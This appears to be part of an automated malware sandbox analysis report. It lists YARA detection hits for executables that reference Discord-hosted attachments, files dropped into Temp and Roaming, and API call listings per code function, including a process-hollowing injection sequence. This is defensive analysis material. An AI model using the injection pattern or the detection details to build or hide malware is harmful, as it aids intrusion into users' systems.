                Source: 39.0.DF3A.exe.ed0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 31.0.DF3A.exe.a40000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 24.0.B096.exe.a00000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 39.0.DF3A.exe.ed0000.9.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 27.0.BBE1.exe.790000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 27.0.BBE1.exe.790000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 27.0.BBE1.exe.790000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 39.0.DF3A.exe.ed0000.5.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 39.0.DF3A.exe.ed0000.7.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 31.0.DF3A.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 27.0.BBE1.exe.790000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 24.0.B096.exe.a00000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 24.0.B096.exe.a00000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: C:\Users\user\AppData\Local\Temp\B096.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: C:\Users\user\AppData\Local\Temp\DEDC.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: C:\Users\user\AppData\Local\Temp\D8D0.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: C:\Users\user\AppData\Local\Temp\FD36.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: String function: 6B59D08C appears 40 times
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: String function: 6B54B150 appears 128 times
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: String function: 6B5D5720 appears 76 times
                Source: C:\Users\user\Desktop\Md0q201V1D.exeCode function: 3_2_0040185B Sleep,NtTerminateProcess,
                Source: C:\Users\user\Desktop\Md0q201V1D.exeCode function: 3_2_00401866 Sleep,NtTerminateProcess,
                Source: C:\Users\user\Desktop\Md0q201V1D.exeCode function: 3_2_0040187A Sleep,NtTerminateProcess,
                Source: C:\Users\user\Desktop\Md0q201V1D.exeCode function: 3_2_0040163B NtMapViewOfSection,
                Source: C:\Users\user\Desktop\Md0q201V1D.exeCode function: 3_2_004018D3 NtTerminateProcess,
                Source: C:\Users\user\Desktop\Md0q201V1D.exeCode function: 3_2_00401884 Sleep,NtTerminateProcess,
                Source: C:\Users\user\Desktop\Md0q201V1D.exeCode function: 3_2_00401888 NtTerminateProcess,
                Source: C:\Users\user\Desktop\Md0q201V1D.exeCode function: 3_2_0040156A NtMapViewOfSection,
                Source: C:\Users\user\Desktop\Md0q201V1D.exeCode function: 3_2_004015DB NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\Desktop\Md0q201V1D.exeCode function: 3_2_004017EA Sleep,NtTerminateProcess,
                Source: C:\Users\user\Desktop\Md0q201V1D.exeCode function: 3_1_0040156A NtMapViewOfSection,
                Source: C:\Users\user\Desktop\Md0q201V1D.exeCode function: 3_1_004015DB NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\Desktop\Md0q201V1D.exeCode function: 3_1_0040163B NtMapViewOfSection,
                Source: C:\Users\user\AppData\Roaming\gbhudtbCode function: 14_2_02BE0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                Source: C:\Users\user\AppData\Local\Temp\21.exeCode function: 19_2_0040185B Sleep,NtTerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\21.exeCode function: 19_2_00401866 Sleep,NtTerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\21.exeCode function: 19_2_0040187A Sleep,NtTerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\21.exeCode function: 19_2_0040163B NtMapViewOfSection,
                Source: C:\Users\user\AppData\Local\Temp\21.exeCode function: 19_2_004018D3 NtTerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\21.exeCode function: 19_2_00401884 Sleep,NtTerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\21.exeCode function: 19_2_00401888 NtTerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\21.exeCode function: 19_2_0040156A NtMapViewOfSection,
                Source: C:\Users\user\AppData\Local\Temp\21.exeCode function: 19_2_004015DB NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\AppData\Local\Temp\21.exeCode function: 19_2_004017EA Sleep,NtTerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\21.exeCode function: 19_1_0040156A NtMapViewOfSection,
                Source: C:\Users\user\AppData\Local\Temp\21.exeCode function: 19_1_004015DB NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\AppData\Local\Temp\21.exeCode function: 19_1_0040163B NtMapViewOfSection,
                Source: C:\Users\user\AppData\Roaming\gbhudtbCode function: 23_2_02CB0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                Source: C:\Users\user\AppData\Roaming\gbhudtbCode function: 28_2_0040185B Sleep,NtTerminateProcess,
                Source: C:\Users\user\AppData\Roaming\gbhudtbCode function: 28_2_00401866 Sleep,NtTerminateProcess,
                Source: C:\Users\user\AppData\Roaming\gbhudtbCode function: 28_2_0040187A Sleep,NtTerminateProcess,
                Source: C:\Users\user\AppData\Roaming\gbhudtbCode function: 28_2_0040163B NtMapViewOfSection,
                Source: C:\Users\user\AppData\Roaming\gbhudtbCode function: 28_2_004018D3 NtTerminateProcess,
                Source: C:\Users\user\AppData\Roaming\gbhudtbCode function: 28_2_00401884 Sleep,NtTerminateProcess,
                Source: C:\Users\user\AppData\Roaming\gbhudtbCode function: 28_2_00401888 NtTerminateProcess,
                Source: C:\Users\user\AppData\Roaming\gbhudtbCode function: 28_2_0040156A NtMapViewOfSection,
                Source: C:\Users\user\AppData\Roaming\gbhudtbCode function: 28_2_004015DB NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\AppData\Roaming\gbhudtbCode function: 28_2_004017EA Sleep,NtTerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_0040181C Sleep,NtTerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_00402406 NtEnumerateKey,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_00401F25 NtQuerySystemInformation,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_00401828 Sleep,NtTerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_00402431 NtEnumerateKey,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_004017DA Sleep,NtTerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_004017F8 NtTerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_0040209A NtQuerySystemInformation,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_004017A3 Sleep,NtTerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5899A0 ZwCreateSection,LdrInitializeThunk,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589860 ZwQuerySystemInformation,LdrInitializeThunk,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589820 ZwEnumerateKey,LdrInitializeThunk,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5898C0 ZwDuplicateObject,LdrInitializeThunk,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589780 ZwMapViewOfSection,LdrInitializeThunk,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58967A NtQueryInformationProcess,LdrInitializeThunk,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589660 ZwAllocateVirtualMemory,LdrInitializeThunk,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589600 ZwOpenKey,LdrInitializeThunk,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B573B48 ZwClose,ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58AB70 ZwReleaseWorkerFactoryWorker,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542B7E ZwSetInformationThread,ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B573B7A RtlAllocateHeap,ZwQuerySystemInformationEx,memset,RtlFreeHeap,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D8372 ZwClose,RtlStringFromGUIDEx,ZwCreateKey,RtlFreeUnicodeString,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5F6369 RtlInitUnicodeString,ZwOpenFile,ZwCreateSection,ZwMapViewOfSection,ZwClose,ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58AB60 ZwReleaseKeyedEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D6365 RtlAllocateHeap,ZwQueryVirtualMemory,memcpy,wcsrchr,RtlFreeHeap,RtlAllocateHeap,memcpy,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618B58 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B575306 ZwReleaseKeyedEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B544B00 TpCallbackMayRunLong,TpCallbackMayRunLong,ZwSetInformationWorkerFactory,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589B00 ZwSetValueKey,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B549335 ZwClose,ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B60131B RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542BC2 ZwOpenThreadToken,ZwSetInformationThread,ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5423F6 ZwClose,RtlFreeHeap,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589BF0 ZwAlertThreadByThreadId,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B55A3E0 RtlFormatCurrentUserKeyPath,ZwQueryInformationToken,RtlLengthSidAsUnicodeString,RtlAppendUnicodeToString,RtlConvertSidToUnicodeString,RtlFreeUnicodeString,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542B93 TpSetDefaultPoolMaxThreads,ZwDuplicateToken,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B601BA8 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57939F RtlInitializeCriticalSectionEx,ZwDelayExecution,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618BB6 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B619BBE RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B60138A memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58A3A0 ZwGetCompleteWnfStateSubscription,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B574BAD RtlAcquireSRWLockExclusive,memset,ZwTraceControl,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618A62 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589A50 ZwCreateFile,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B549240 ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlFreeHeap,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D1242 ZwUnmapViewOfSection,ZwClose,ZwClose,ZwClose,ZwClose,ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B545210 RtlGetCurrentDirectory_U,memcpy,RtlGetCurrentDirectory_U,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589A00 ZwProtectVirtualMemory,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57B230 EtwEventWrite,ZwTraceEvent,RtlNtStatusToDosError,EtwEventWrite,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589A30 ZwTerminateThread,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B548239 RtlInitUnicodeStringEx,ZwQueryValueKey,RtlInitUnicodeStringEx,RtlPrefixUnicodeString,ZwEnumerateKey,ZwOpenKey,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,ZwClose,RtlAllocateHeap,RtlCompareUnicodeString,ZwClose,RtlFreeHeap,ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B544A20 RtlGetCurrentServiceSessionId,RtlFreeHeap,ZwClose,RtlReleaseActivationContext,LdrUnloadDll,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618214 RtlAcquireSRWLockExclusive,ZwSetInformationWorkerFactory,RtlReleaseSRWLockExclusive,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D4A28 ZwOpenKey,DbgPrintEx,ZwQueryValueKey,DbgPrintEx,DbgPrintEx,memcpy,ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A229 ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlFillMemoryUlong,DbgPrint,DbgPrint,DbgPrint,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56FAD0 RtlAcquireSRWLockShared,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockShared,ZwTerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D1AD6 ZwFreeVirtualMemory,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58AAC0 ZwQueryWnfStateNameInformation,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589AE0 ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58AAE0 ZwRaiseException,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618ADD RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57D294 ZwQueryAttributesFile,RtlFreeHeap,ZwClose,RtlFreeHeap,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58AA90 ZwQuerySystemInformationEx,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54429E RtlInitUnicodeString,ZwClose,LdrQueryImageFileKeyOption,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B562280 RtlAcquireSRWLockExclusive,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,ZwTerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58B280 ZwWow64DebuggerCall,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57DA88 RtlAcquireSRWLockExclusive,RtlImageNtHeader,RtlAllocateHeap,ZwUnmapViewOfSection,ZwClose,RtlReAllocateHeap,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589AB0 ZwWaitForMultipleObjects,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57E2BB ZwWaitForAlertByThreadId,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B541AA0 RtlAllocateHandle,RtlReAllocateHeap,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlAllocateHeap,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B575AA0 TpSetPoolMaxThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMaxThreads,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54F150 RtlOpenCurrentUser,RtlFormatCurrentUserKeyPath,ZwOpenKey,RtlFreeUnicodeString,RtlOpenCurrentUser,RtlInitUnicodeString,ZwOpenKey,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618966 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58B150 ZwUnsubscribeWnfStateChange,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54395E RtlAcquireSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56B944 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,RtlGetCurrentServiceSessionId,ZwSetTimer2,RtlGetCurrentServiceSessionId,ZwCancelTimer2,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57D976 ZwCreateFile,ZwCreateFile,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54B171 ZwQueryDebugFilterState,_alloca_probe_16,memcpy,_vsnprintf,ZwWow64DebuggerCall,RtlRaiseException,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D1976 ZwCreateEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58B160 ZwUpdateWnfStateData,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58A160 ZwCreateWorkerFactory,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B549100 TpReleasePool,RtlAcquireSRWLockExclusive,ZwShutdownWorkerFactory,RtlGetCurrentServiceSessionId,TpReleasePool,TpReleasePool,RtlDebugPrintTimes,TpReleasePool,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B550100 LdrUnloadAlternateResourceModuleEx,RtlAcquireSRWLockExclusive,ZwUnmapViewOfSection,ZwClose,LdrUnloadAlternateResourceModuleEx,RtlFreeHeap,RtlFreeHeap,RtlReAllocateHeap,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589900 ZwOpenEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B61F13B ZwOpenKey,ZwCreateKey,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5E5100 RtlAssert,RtlCaptureContext,DbgPrintEx,DbgPrompt,ZwTerminateThread,DbgPrintEx,RtlAssert,ZwTerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D193B ZwRaiseException,ZwTerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58A130 ZwCreateWaitCompletionPacket,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589920 ZwDuplicateToken,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B6189E7 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D19C8 ZwCreateSection,ZwMapViewOfSection,memset,ZwUnmapViewOfSection,ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B6049A4 ZwAllocateVirtualMemory,RtlCompareMemory,memcpy,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589990 ZwQueryVolumeInformationFile,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54519E RtlEqualUnicodeString,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56C182 RtlGetCurrentServiceSessionId,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B61F1B5 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58B180 ZwWaitForAlertByThreadId,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589980 ZwCreateEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5F6186 ZwQueryValueKey,memmove,RtlInitUnicodeString,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C51BE ZwQuerySystemInformation,ZwQuerySystemInformationEx,RtlAllocateHeap,ZwQuerySystemInformationEx,RtlFindCharInUnicodeString,RtlEnterCriticalSection,memcpy,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58A9B0 ZwQueryLicenseValue,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57C9BF DbgPrintEx,wcsrchr,memcpy,DbgPrintEx,ZwClose,DbgPrintEx,DbgPrintEx,RtlDosPathNameToRelativeNtPathName_U,DbgPrintEx,ZwOpenFile,ZwClose,RtlFreeHeap,DbgPrintEx,DbgPrintEx,DbgPrintEx,RtlDeleteBoundaryDescriptor,ZwClose,RtlFreeHeap,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B60A189 RtlAcquireSRWLockExclusive,ZwGetNlsSectionPtr,RtlAllocateHeap,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58B1A0 ZwWaitForKeyedEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B545050 RtlSetCurrentDirectory_U,RtlAllocateHeap,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlSetCurrentDirectory_U,RtlFreeHeap,RtlFreeHeap,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589850 ZwQueryDirectoryFile,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589840 ZwDelayExecution,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D1879 ZwAllocateVirtualMemory,memset,RtlInitializeSid,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618858 ZwAlertThreadByThreadId,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B55106F ZwOpenKey,ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54F018 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589830 ZwOpenFile,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B574020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion,
